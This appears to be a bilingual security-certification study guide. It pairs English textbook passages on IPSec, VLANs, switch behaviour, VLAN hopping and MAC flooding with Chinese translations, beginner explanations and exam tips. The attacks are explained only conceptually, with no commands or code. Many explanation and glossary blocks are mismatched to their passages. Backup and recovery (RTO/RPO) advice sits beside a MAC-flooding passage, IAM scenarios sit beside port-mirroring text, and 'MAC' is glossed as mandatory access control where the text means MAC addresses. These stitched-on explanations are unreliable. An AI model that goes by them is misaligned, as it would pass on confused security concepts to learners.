For most secure protocols, if the S in the name is a prefix, like with SFTP, then the encryption is provided by SSH (which has an S as its first letter). If the S in the name is a suffix, like with HTTPS, then the encryption is provided by TLS (which has S as its last letter). OpenVPN OpenVPN is based on TLS (formally SSL) and provides an easy-to-configure but robustly secured VPN option. OpenVPN is an open source implementation that can use either preshared passwords or certificates for authentication. Many WAPs support OpenVPN, which is a native VPN option for using a home or business WAP as a VPN gateway.

IP Security Protocol Internet Protocol Security (IPSec) is a standard of IP security extensions used as an add-on for IPv4 and integrated into IPv6. The primary use of IPSec is for establishing VPN links between internal and/or external hosts or networks. IPSec works only on IP networks and provides for secured authentication as well as encrypted data transmission. IPSec is sometimes paired with L2TP as L2TP/IPSec. IPSec isn't a single protocol but rather a collection of protocols, including AH, ESP, HMAC, IPComp, and IKE. Authentication Header (AH) provides assurances of message integrity and nonrepudiation.

AH also provides the primary authentication function for IPSec, implements session access control, and prevents replay attacks. Encapsulating Security Payload (ESP) provides confidentiality and integrity of payload contents. It provides encryption, offers limited authentication, and prevents replay attacks. Modern IPSec ESP typically uses advanced encryption standard (AES) encryption. The limited authentication allows ESP to establish its own links without using AH and perform periodic mid-session reauthentication to detect and respond to session hijacking. ESP can operate in either transport mode or tunnel mode.

Hash-based Message Authentication Code (HMAC) is the primary hashing or integrity mechanism used by IPSec.

中文直译 / 整理

对于大多数安全协议,如果名称中的 S 是前缀,例如 SFTP,则加密由 SSH 提供(SSH 的首字母为 S)。 如果名称中的 S 是后缀,例如 HTTPS, 则加密由 TLS 提供(TLS 的末字母为 S)。 OpenVPN OpenVPN 基于 TLS(正式称为 SSL),提供一种易于配置但安全性强大的 VPN 选项。 OpenVPN 是一个开源实现,可以使用预共享密码或证书进行身 份验证。 许多 WAP 支持 OpenVPN,它是将家庭或企业 WAP 用作 VPN 网 关的原生 VPN 选项。 IP 安全协议 互联网协议安全(IPSec) 是一种 IP 安全扩展标准,用作 IPv4 的附加组件, 并集成到 IPv6 中。 IPSec 的主要用途是建立内部和/或外部主机或网络之间的 VPN 连接。 IPSec 仅在 IP 网络上工作,提供安全的身份验证和加密数据传输。 IPSec 有时与 L2TP 配对使用,形成 L2TP/IPSec。 IPSec 不是单一协议,而是一组协议的集合,包括 AH、ESP、HMAC、I PComp 和 IKE。 认证头(AH) 提供消息完整性与不可否认性性的保证。

AH 还为 IPSec 提供 主要的身份验证功能,实现会话访问控制,并防止重放攻击。 封装安全有效载荷(ESP)提供有效载荷内容的机密性和完整性。 它提供加密、 有限的认证,并防止重放攻击。 现代IPSec ESP通常使用先进的 加密标准(AES)加密。 有限的认证使ESP能够无需使用AH建立自己的连接, 并在会话期间定期重新认证,以检测和应对会话劫持。 ESP可以在传输模式或 隧道模式下运行。 基于哈希的消息认证码(HMAC)是IPSec使用的主要哈希或完整性机制。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 43 / PDF P880

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

IP Payload Compression (IPComp) is a compression tool used by IPSec to compress data prior to ESP encrypting it in order to attempt to keep up with wire-speed transmission. IPSec uses public-key cryptography and symmetric cryptography to provide encryption (aka hybrid cryptography), secure key exchange, access control, nonrepudiation, and message authentication, all using standard Internet protocols and algorithms. The mechanism of IPSec that manages cryptography keys is Internet Key Exchange (IKE). IKE is composed of three elements: OAKLEY, SKEME, and ISAKMP. OAKLEY is a key generation and exchange protocol similar to Diffie–Hellman.

Secure Key Exchange Mechanism (SKEME) is a means to exchange keys securely, similar to a digital envelope. Modern IKE implementations may also use ECDHE for key exchange. Internet Security Association and Key Management Protocol (ISAKMP) is used to organize and manage the encryption keys that have been generated and exchanged by OAKLEY and SKEME. A security association is the agreed-on method of authentication and encryption used by two entities (a bit like a digital keyring). ISAKMP is used to negotiate and provide authenticated keying material (a common method of authentication) for security associations in a secured manner.

Each IPSec VPN uses two security associations, one for encrypted transmission and the other for encrypted reception. Thus, each IPSec VPN is composed of two simplex communication channels that are independently encrypted. ISAKMP's use of two security associations per VPN is what enables IPSec to support multiple simultaneous VPNs from each host. Switching and Virtual LANs Switches are the most common modern network management device. A switch operates primarily at Layer 2 but may be equipped to operate at Layer 3 (or higher) for specialty purposes. An unmanaged switch has no configuration options. A managed switch may offer numerous configuration options, such as VLANs and MAC limiting.

All switches operate around four primary functions: learning, forwarding, dropping, and flooding. Learning or learning mode is how a switch becomes aware of its local network. Each received inbound Ethernet frame is evaluated. First, the source MAC address is checked against the content addressable memory (CAM) table. The CAM table is held in switch memory and contains a mapping IP

中文直译 / 整理

载荷压缩(IPComp)是IPSec用于在ESP加密数据前压缩数据的工具,以 尝试跟上线路速度传输。 IPSec 使用公钥密码学和对称密码学来提供加密(即混合密码学)、安全 密钥交换、访问控制、不可否认性性以及消息认证,所有这些均基于标准的互联 网协议和算法。 IPSec 中管理密码学密钥的机制是 Internet Key Exchange (IKE)。 IKE 由三个组件组成:OAKLEY、SKEME 和 ISAKMP。 OAKLEY 是 一种类似于 Diffie–Hellman 的密钥生成与交换协议。 Secure Key Exchange Mechanism (SKEME) 是一种安全交换密钥的方法,类似于数字信封。 现代的 IKE 实现也可能使用 ECDHE 进行密钥交换。 Internet Security Association and Key Management Protocol(ISAKMP) 用于组织和管理由 OAKLEY 和 SKEME 生成并交换的加密密钥。 安全关联是两个实体之间商定的认证和加密 方法(类似于数字密钥环)。

ISAKMP 用于以安全的方式协商并提供安全关联 的认证密钥材料(一种常见的认证方法)。 每个 IPSec VPN 使用两个安全关联, 一个用于加密传输,另一个用于加密接收。 因此,每个 IPSec VPN 由两个独立 加密的单向通信通道组成。 ISAKMP 为每个 VPN 使用两个安全关联,这使得 IPSec 能够支持每个主机同时建立多个 VPN。 交换与虚拟局域网 交换机是最常见的现代网络管理设备。 交换机主要在第2层运行,但可能配备 用于特殊用途的第3层(或更高层)功能。 非管理型交换机没有配置选项。 管 理型交换机可能提供多种配置选项,例如VLAN和MAC地址限制。 所有交换机都围绕四个主要功能运行:学习、转发、丢弃和广播。 学习或学习模式是交换机了解其本地网络的方式。 每个接收到的入站以太网帧 都会被评估。 首先,检查源MAC地址是否存在于内容可寻址内存(CAM)表 中。 CAM表存储在交换机内存中,包含MAC地址与端口号的映射

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 44 / PDF P881

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

between MAC address and port number. In this case, the port number is the physical RJ-45 jack rather than a Transport-layer protocol concern. If the Ethernet frame's source MAC address is not in the CAM table, it is added. Second, the destination MAC address is checked against the CAM table. If the address is present, then the exit port in the table is compared to the port that the current Ethernet frame was received on. If the port numbers are different, then the frame is forwarded out the exit port. If the port numbers are the same, then the frame is dropped (since it is already present on the correct network segment).

If the destination MAC address is not present in the CAM table, then it is flooded or sent out all ports. This is done to hopefully allow the frame to reach its destination even if the destination is not known. A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. By default, all ports on a switch are part of VLAN 1. But as the switch administrator changes the VLAN assignment on a port-by-port basis, various ports can be grouped together and kept distinct from other VLAN port designations. VLANs can also be assigned or created based on the device's MAC address, IP subnetting, specified protocols, or authentication.

VLAN management is most commonly used to distinguish between user traffic and management traffic. VLAN 1, the default VLAN, is typically designated as the VLAN for management traffic. VLANs are used for traffic management because they are a form of network segmentation. Network segments exist to contain traffic within and block traffic attempting to exit or enter. Communications between members of the same VLAN occur without hindrance, but communications between VLANs require a routing function. VLAN routing can be provided either by an external router or by the switch's internal software (one reason for the terms L3 switch and multilayer switch).

VLANs are treated like subnets but aren't subnets. VLANs are created by switches. Subnets are created by IP address and subnet mask assignments. VLAN management is the use of VLANs to control traffic for security or performance reasons. VLANs can be used to isolate traffic between network segments. This can be accomplished by not defining a route between different VLANs or by specifying a deny filter between certain VLANs (or certain members of a VLAN). Any network segment that doesn't need to communicate with another in order to accomplish a work task/function shouldn't be able to do so.

VLANs should be used to allow communications that are necessary and to block/deny anything that isn't necessary. MAC

中文直译 / 整理

地址与端口号之间的映射。 在此情况下,端口号指的是物理RJ‑45接口, 而非传输层协议的关注点。 如果以太网帧的源MAC地址不在CAM表中,则将其 添加。 其次,检查目标MAC地址是否存在于CAM表中。 如果地址存在,则将表 中的出口端口与当前以太网帧接收的端口进行比较。 如果端口号不同,则将帧 转发到出口端口; 如果端口号相同,则丢弃该帧(因为该帧已位于正确的网络 段上)。 如果目标MAC地址不在CAM表中,则将该帧泛洪或发送到所有端口。 这样做的目的是为了确保即使目标地址未知,帧也有望到达其目的地。 一个 虚拟局域网(VLAN) 是由交换机创建的硬件强制网络分段。 默认情况下, 交换机上的所有端口都属于 VLAN 1。 但当交换机管理员逐端口更改 VLAN 分 配时,不同的端口可以被分组在一起,并与其他 VLAN 端口分配保持独立。 VLAN 还可以根据设备的 MAC 地址、IP 子网、指定协议或认证进行分配或创 建。 VLAN 管理最常用于区分用户流量和管理流量。 VLAN 1 是默认 VLAN, 通常被指定为管理流量的 VLAN。 VLAN 用于流量管理,因为它们是一种网络分段形式。

网络分段的存在是为了 在内部限制流量,并阻止尝试进出的流量。 同一 VLAN 成员之间的通信不会 受到阻碍,但 VLAN 之间的通信需要路由功能。 VLAN 路由可通过外部路由 器或交换机的内部软件提供(这也是 三层交换机 和 多层交换机 这两个术语的 原因)。 VLAN 被视为子网,但并非子网。 VLAN 由交换机创建,而子网则通 过 IP 地址和子网掩码分配创建。 VLAN管理是利用VLAN基于安全或性能原因控制流量。 VLAN可用于隔离网络 段之间的流量。 这可以通过不在不同VLAN之间定义路由,或在特定VLAN(或 VLAN的特定成员)之间指定拒绝过滤器来实现。 任何无需与其他网络段通信 即可完成工作任务/功能的网络段,都不应具备这种通信能力。 VLAN应仅用于 允许必要的通信,并阻止/拒绝所有不必要的通信。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 45 / PDF P882

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Remember, “deny by default; allow by exception” isn't a guideline just for firewall rules but for security in general. VLANs are used to segment a network logically without altering its physical topology. They are easy to implement, have little administrative overhead, and are a hardware-based solution (specifically a Layer 3 switch). As networks are being crafted in virtual environments or in the cloud, software switches or virtual switches are often used. In these situations, VLANs are not hardware-based but instead are switch software–based implementations or impositions. A VLAN is an example of a virtualized network.

In cloud and virtual environments, distributed virtual switches are becoming more common than stand-alone virtual switches because they help reduce the chance of introducing configuration errors. They are more easily centrally managed and can be managed using an infrastructure as code (IaC) architecture approach. VLANs control and restrict broadcast traffic and reduce a network's vulnerability to sniffers because a switch treats each VLAN as a separate network division.

It's the routing function between VLANs that blocks Ethernet broadcasts between subnets and VLANs, because a router (or any device performing Layer 3 routing functions such as a Layer 3 switch) doesn't forward Layer 2 Ethernet broadcasts. This feature of a switch blocks Ethernet broadcasts between VLANs and so helps protect against broadcast storms. A broadcast storm is a flood of unwanted Ethernet broadcast network traffic. Another element of some VLAN deployments is that of port isolation or private ports. These are private VLANs that are configured to use a dedicated or reserved uplink port.

The members of a private VLAN or a port-isolated VLAN can interact only with each other and over the predetermined exit port or uplink port. A common implementation of port isolation occurs in hotels. A hotel network can be configured so that the Ethernet ports in each room or suite are isolated on unique VLANs. This way, connections in the same unit can communicate but connections between units cannot. However, all of these private VLANs have a path out to the Internet (i.e., the uplink port).

中文直译 / 整理

请记住,“默认拒绝; 例外允许”不仅是防火墙规则的指导原则,也是整体安 全的指导原则。 VLAN用于在不改变物理拓扑的情况下逻辑上划分网络。 它们易于实现,管理 开销小,并且是一种基于硬件的解决方案(具体而言是第3层交换机)。 随着 网络在虚拟环境或云中构建,通常使用软件交换机或虚拟交换机。 在这些情况 下,VLAN并非基于硬件,而是基于交换机软件的实现或强制配置。 VLAN是 虚拟化网络的一个示例。 在云和虚拟环境中,分布式虚拟交换机比独立虚拟交换机更为常见, 因为它们有助于减少配置错误的发生。 它们更容易集中管理,并可通过基 础架构即代码(IaC)架构方式进行管理。 VLAN通过将每个VLAN视为独立的网络划分来控制和限制广播流量,并降低 网络对嗅探器的脆弱性。 正是VLAN之间的路由功能阻止了子网和VLAN之间 的以太网广播,因为路由器(或执行第3层路由功能的任何设备,如第3层交换 机)不会转发第2层以太网广播。 交换机的这一特性阻止了VLAN之间的以太网 广播,从而有助于防止广播风暴。 广播风暴是指大量不必要的以太网广播网络 流量。 VLAN部署的另一个要素是端口隔离或私有端口。

这些是配置为使用专用或预 留上行端口的私有VLAN。 私有VLAN或端口隔离VLAN的成员只能彼此之间 以及通过预设的出口端口或上行端口进行通信。 端口隔离的常见实现发生在酒 店中。 酒店网络可以配置为使每个房间或套房的以太网端口位于独立的 VLAN上。 这样,同一单元内的连接可以通信,但不同单元之间的连接则无法 通信。 然而,所有这些私有VLAN都有通往互联网的路径(即上行端口)。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 46 / PDF P883

第 883 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Switch Eavesdropping A port mirror is a common feature found on managed switches; it will duplicate traffic from one or more other ports out a specific port. A switch may have a hardwired Switched Port Analyzer (SPAN) port, which duplicates the traffic for all other ports, or any port can be configured as the mirror, audit, IDS, or monitoring port for one or more other ports. Port mirroring or port spanning takes place on the switch itself. Port mirroring and spanning is often used for network traffic analysis, packet capture, evidence collection, and intrusion detection.

A port tap is a means to eavesdrop on network communications, especially when a switch's SPAN function isn't available or doesn't meet the current interception needs. Modern inline taps have mostly replaced vampire taps. To install an inline tap, first, the original cable must be unplugged from the port and then plugged into the tap. Then, the tap is plugged into the vacated original port. A tap should be installed wherever traffic monitoring on a specific cable is required. If there are more devices in an area than there are ports on a switch, additional switches can be deployed. Several switches can be linked together through their trunk ports.

A trunk port is a dedicated port with higher bandwidth capacity than the other standard access ports. Switches are typically linked using a crossover cable, but if the ports are Auto-MDIX (medium-dependent interface crossover), then they will automatically configure themselves to adapt to whatever cable is used to link the devices. The trunk link allows the switches to talk to each other directly, direct traffic between hosts, and stretch VLAN definitions across multiple physical switches. In this manner, VLAN3 on switch 2 can be part of the same VLAN as VLAN3 on switches 4 and 5. This is accomplished using special signaling defined in IEEE 802.1q (Dot1q) known as VLAN tagging.

VLAN tags modify the standard construction of an Ethernet frame header to include a VLAN tag value. A standard Ethernet header is: [Dst MAC | Src MAC | Ethertype] A modified Ethernet header with a VLAN tag is structured like this: [Dst MAC | Src MAC | VLAN | Ethertype]

中文直译 / 整理

交换机窃听 端口镜像是托管交换机上常见的功能; 它会将一个或多个其他端口的流量 复制到特定端口。 交换机可能具有硬连线的交换端口分析器(SPAN)端口, 该端口复制所有其他端口的流量,或者任何端口都可以配置为一个或多个 其他端口的镜像、审计、IDS或监控端口。 端口镜像或端口汇聚发生在交换 机本身上。 端口镜像和汇聚常用于网络流量分析、数据包捕获、证据收集 和入侵检测。 端口分流器是一种用于窃听网络通信的手段,尤其在交换机的SPAN功能 不可用或无法满足当前截获需求时使用。 现代的串联分流器已基本取代了 吸血鬼分流器。 安装串联分流器时,首先需将原始电缆从端口拔下,然后 插入分流器; 接着将分流器插入原端口空出的位置。 凡需要对特定电缆进 行流量监控的地方,都应安装分流器。 如果某个区域的设备数量超过交换机端口数量,可以部署额外的交换机。 多个 交换机可以通过其主干端口相互连接。 主干端口是具有比其他标准接入端口更 高带宽容量的专用端口。 交换机通常使用交叉电缆连接,但如果端口支持 Auto‑MDIX(介质相关接口交叉),则会自动配置以适应所使用的任何电缆。

主干链路允许交换机直接相互通信、在主机之间直接转发流量,并将VLAN定 义扩展到多个物理交换机上。 这样,交换机2上的VLAN3可以与交换机4和5上 的VLAN3属于同一个VLAN。 这通过IEEE 802.1q(Dot1q)定义的特殊信令—— VLAN标签实现。 VLAN标签修改了以太网帧头的标准结构,以包含VLAN标 签值。 标准以太网帧头为: [目的MAC | 源MAC | 以太网类型] 带有 VLAN 标签的修改版以太网报头结构如下: [Dst MAC | Src MAC | VLAN | Ethertype]

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

标准:标准给出必须满足的最低要求。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 883 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Minimum level、mandatory requirement 常对应 standard。

检测是 IDS,主动阻断更像 IPS。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
标准 标准给出必须满足的最低要求。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 47 / PDF P884

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Thus, a VLAN tag–modified Ethernet header cannot be interpreted by any host other than a switch, and then the switch is prepared to do so only on a trunk port. However, there is the possibility of abuse of the VLAN tag system. An attacker could construct a header with multiple tags in order to perform VLAN hopping. The double-tagged Ethernet frame could start off in VLAN3 but then move into VLAN2. Early switches were not prepared for double tagging, so after reading the first VLAN tag into memory (such as VLAN3), the second VLAN tag (such as VLAN2) would overwrite the first in memory, thus only retaining the second value.

When the switch then began to forward the frame, it would be placed into the second VLAN group. The concept of OS virtualization has given rise to other virtualization topics, such as virtualized networks. A virtualized network or network virtualization is the combination of hardware and software networking components into a single integrated entity. The resulting system allows for software control over all network functions: management, traffic shaping, address assignment, and so on. A single management console or interface can be used to oversee every aspect of the network, a task requiring physical presence at each hardware component in the past.

Virtualized networks have become a popular means of infrastructure deployment and management by corporations worldwide. They allow organizations to implement or adapt other interesting network solutions, including software-defined networks, VLANs, virtual switches, virtual SANs, guest operating systems, port isolation, and more. Virtual networks are also discussed in Chapter 11, and software-defined networking (SDN) is discussed in Chapter 9. MAC Flooding Attack A MAC flooding attack is an intentional abuse of a switch's learning function to cause it to get stuck flooding. This is accomplished by flooding a switch with Ethernet frames with randomized source MAC addresses.

The switch will attempt to add each newly discovered source MAC address to its content addressable memory (CAM) table. Once the CAM table is full, older entries will be dropped to make room for new entries (it is a first-in, first-out [FIFO] queue). Once the CAM is full of only false addresses, the switch is unable to properly forward traffic, so it reverts to flooding mode, where it acts like a hub or a multiport repeater and sends each received Ethernet frame out of every port.

中文直译 / 整理

因此,带有 VLAN 标签的修改版以太网报头只能被交换机解释,且交换机仅 在中继端口上准备进行此操作。 然而,VLAN标签系统存在被滥用的可能性。 攻击者可以构造包含多个标签的头 部,以执行VLAN跳跃。 双标签以太网帧可能最初位于VLAN3,随后转移到 VLAN2。 早期的交换机并未针对双标签进行准备,因此在将第一个VLAN标签 (如VLAN3)读入内存后,第二个VLAN标签(如VLAN2)会覆盖内存中的第 一个标签,从而仅保留第二个值。 当交换机开始转发该帧时,它会被放入第二 个VLAN组中。 操作系统虚拟化的概念催生了其他虚拟化主题,例如虚拟化网络。 虚拟化网络 或网络虚拟化是将硬件和软件网络组件整合为一个统一的整体。 由此产生的系 统允许通过软件控制所有网络功能:管理、流量整形、地址分配等。 过去需要 物理接触每个硬件组件才能完成的网络管理任务,现在可以通过单一管理控制 台或界面来完成。 虚拟化网络已成为全球企业部署和管理基础设施的流行方式。 它们使组织能够实现或适应其他有趣的网络解决方案,包括软件定义网络、 VLAN、虚拟交换机、虚拟SAN、客户操作系统、端口隔离等。

虚拟网络还在 第11章中进行了讨论,软件定义网络(SDN)则在第9章中进行了讨论。 MAC泛洪攻击 一种 MAC泛洪 攻击是故意滥用交换机的学习功能,使其陷入泛洪状态。 这通 过向交换机发送具有随机源 MAC 地址的以太网帧来实现。 交换机会尝试将每 个新发现的源 MAC 地址添加到其内容可寻址内存(CAM)表中。 一旦 CAM 表满,较旧的条目将被丢弃以腾出空间给新条目(这是一个先进先出 [ FIFO] 队列)。 当 CAM 表中仅存虚假地址时,交换机将无法正确转发流量, 因此会回退到泛洪模式,在此模式下,它像集线器或多端口中继器一样,将每 个接收到的以太网帧从所有端口发出。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
